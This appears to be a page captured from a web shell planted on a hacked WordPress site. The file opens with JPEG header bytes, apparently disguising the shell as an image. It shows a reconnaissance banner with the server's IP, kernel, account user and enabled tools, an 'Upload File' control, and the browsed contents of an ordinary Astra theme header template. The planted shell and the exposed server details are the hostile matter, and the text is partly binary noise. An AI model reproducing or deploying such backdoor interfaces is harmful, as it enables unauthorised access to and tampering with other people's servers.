????JFIF??x?x????'
Server IP : 104.21.32.1 / Your IP : 216.73.216.243 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/pontiacques.org/wp-content/themes/astra/template-parts/header/ |
Upload File : |
<?php /** * Template for Primary Header * * The header layout 2 for Astra Theme. ( No of sections - 1 [ Section 1 limit - 3 ) * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @see https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Astra * @link https://wpastra.com/ * @since Astra 1.0.0 */ ?> <div class="main-header-bar-wrap"> <div <?php echo wp_kses_post( astra_attr( 'main-header-bar' ) ); ?>> <?php astra_main_header_bar_top(); ?> <div class="ast-container"> <div class="ast-flex main-header-container"> <?php astra_masthead_content(); ?> </div><!-- Main Header Container --> </div><!-- ast-row --> <?php astra_main_header_bar_bottom(); ?> </div> <!-- Main Header Bar --> </div> <!-- Main Header Bar Wrap -->